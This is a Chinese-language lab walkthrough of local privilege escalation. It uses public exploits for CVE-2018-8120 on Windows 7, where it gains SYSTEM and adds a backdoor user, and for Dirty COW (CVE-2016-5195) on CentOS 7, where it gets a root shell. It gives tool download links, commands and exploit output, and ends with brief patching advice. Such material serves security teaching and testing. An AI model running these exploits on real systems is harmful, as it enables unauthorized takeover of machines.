第1章 实战：Win7系统提权

1.1 实验环境

1.2 使用CVE-2018-8120漏洞进行提权

1.2.1 下载提权工具

https://github.com/unamer/CVE-2018-8120

1.2.2 使用提权工具

C:\Users\pm>cd C:\Users\pm\Desktop\CVE-2018-8120-master\x64\Release

# 提权为system用户
C:\Users\pm\Desktop\CVE-2018-8120-master\x64\Release>CVE-2018-8120.exe whoami
CVE-2018-8120 exploit by @unamer(https://github.com/unamer)
[+] Detected kernel ntkrnlmp.exe
[-] Could not load ntkrnlmp.exe , load ntoskrnl.exe instead.
[+] Get manager at fffff900c095ec90,worker at fffff900c07ffc90
[+] Triggering vulnerability...
[+] Overwriting...fffff80003c4bc68
[+] Elevating privilege...
[+] Cleaning up...
[+] Trying to execute whoami as SYSTEM...
[+] Process created with pid 2716!
nt authority\system

# 新建用户
C:\Users\pm\Desktop\CVE-2018-8120-master\x64\Release>CVE-2018-8120.exe "net user leon 123456 /add"
CVE-2018-8120 exploit by @unamer(https://github.com/unamer)
[+] Detected kernel ntkrnlmp.exe
[-] Could not load ntkrnlmp.exe , load ntoskrnl.exe instead.
[+] Get manager at fffff900c0115700,worker at fffff900c317fb60
[+] Triggering vulnerability...
[+] Overwriting...fffff80003c4bc68
[+] Elevating privilege...
[+] Cleaning up...
[+] Trying to execute net user leon 123456 /add as SYSTEM...
[+] Process created with pid 2208!

1.2.3 解决方案

及时更新到最新的操作系统即可。

第2章 实战：CentOS7系统提权

2.1 实验环境

2.2 使用CVE-2016-5195漏洞进行提权

2.2.1 下载提权工具

https://github.com/gbonacini/CVE-2016-5195

2.2.2 使用提权工具

[java@test ~]$ unzip CVE-2016-5195.zip
[java@test ~]$ cd CVE-2016-5195-master/
[java@test CVE-2016-5195-master]$ make
[java@test CVE-2016-5195-master]$ ./dcow -s
Running ...
Password overridden to: dirtyCowFun

Received su prompt (Password: )

Last login: Thu Aug  4 00:28:40 CST 2022 on pts/1
[root@test ~]# echo 0 > /proc/sys/vm/dirty_writeback_centisecs
[root@test ~]# \cp /tmp/.ssh_bak /etc/passwd
[root@test ~]# \rm /tmp/.ssh_bak

• 【参数说明】：
• -s：自动打开shell，结束后还原root密码
• -n：自动打开shell，结束后不还原root密码

2.2.3 解决方案

更新内核到最新版本，CentOS7.3及之后修复该漏洞。